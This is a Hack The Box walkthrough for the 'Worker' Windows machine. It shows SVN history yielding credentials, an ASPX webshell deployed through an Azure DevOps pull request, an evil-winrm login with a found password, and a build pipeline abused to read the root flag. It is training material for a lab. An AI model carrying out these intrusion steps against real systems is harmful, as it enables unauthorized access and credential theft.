Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with thousands of people in the security field.
Header

Worker is a Medium level Windows machine. Based on the creator and community statistics, this box is highly customized and will require us to put some extra effort into the enumeration phase.
Statistics

Information Gathering

Nmap:

By scanning the target IP with Nmap, we’re able to find what ports are open (-p), while fingerprinting the services running and their versions (-sV). We’re also running the default set of scripts (-sC), which can help find additional information and automate some of our initial steps. Once the scan is completed, nmap with write the results to our Extracts folder (-oA)
>> nmap -p80,3690,5985 -sC -sV -oA Extracts/Worker 10.10.10.203
Nmap

Subversion

Using the SVN CLI tool, let’s connect to the server and list out the directories and files available.
>> svn ls svn://10.10.10.203
List

There’s a dimension.worker.htb reference that we can add to our hosts file, as well as a directory containing the website and moved.txt file. Our next step is to copy down the contents to our local machine.
>> svn cp svn://10.10.10.203 ./svn
Copy

Worker site

Digging around the dimension.worker.htb site, we come across a collection of additional subdomains including alpha, cartoon, lens, solid-state, spectral, and story. None of these sites appeared to have anything of value. Worker

Version Hostory

Reading the moved.txt file, it looks like the latest version of the site has been migrated to devops.worker.htb.
Moved

One of the main features of version control is the ability to track changes and revisit previous iterations of a file. Using the SVN CLI, we’re able to check the logs for any comments that stand out as referencing the past site.
>> svn log svn://10.10.10.203
Log

Let’s check out the changes lining up with r2, “Added deployment script”.
>> svn co -r2 svn://10.10.10.203/ ./r2
Checkout

Credentials

Looks like we’ve found Nathen’s credentials in the deployment script.
Deploy

Authentication

Navigating to the devops site referenced in the moved.txt file, we’re hit with a login screen. Let’s try out Nathen’s credentials.
Devops

Azure DevOps

Azure DevOps is a platform for storing, testing, and deploying source code using the CI/CD (Continuous Integration / Continuous Delivery) framework. As changes are commited, Azure DevOps has all the information it needs to access and make updates to resources. We should be able to leverage our access here, leading to additional compromise.
Devops Authenticated

Foothold

Deploying our Webshell

From the Spectral Repository, we’ll first create a new branch for us to make changes to.
Branch

Upload our ASPX Webshell to the branch.
Upload

With our changes made, we can create a pull request to merge them in and trigger the CI/CD process. This will deploy the shell to http://spectral.worker.htb/shell.aspx
Pull Request

Applying the final touches to the PR, we’re able to approve it and get it deployed.
Pull Request Complete

Webshell

Navigating to our Webshell, we’re able to look around the machine for interesting files and information. Located in the W:/svnrepos/www/conf/ directory, a passwd file contains credentials for a wide range of users.
Credentials

Comparing the discovered credentials with the list of users we see in the C:/Users/ directory, it looks like user robisl will be our way in.
Users

WinRM

Now that we have credentials for the target box, we can user Evil-WinRM to get a shell.
>> evil-winrm -i 10.10.10.203 -u robisl -p wolves11
WinRM

User Flag

>> type ../Desktop/user.txt
User Flag

Privilege Escalation

Using robisl’s credentials, let’s try to log into the Azure DevOps platform and see what kind of access he has.
Devops

Azure DevOps Pipeline

Another feature of Azure DevOps is the ability to create build pipelines. A pipeline is a representation of the automation process that runs to build and test an application. The automation process is just a collection of tasks that we can define. We should be able to use this feature to execute commands on the server.

Navigate to Pipelines > New Pipeline
Pipeline

Select Azure Repos Git
Pipeline 2

Choose the PartsUnlimited repository, and then the Starter Pipeline. Here, we’ll update the pipline to print out the contents of the root flag file right into its output.
Pipeline 3

Root Flag

Root Flag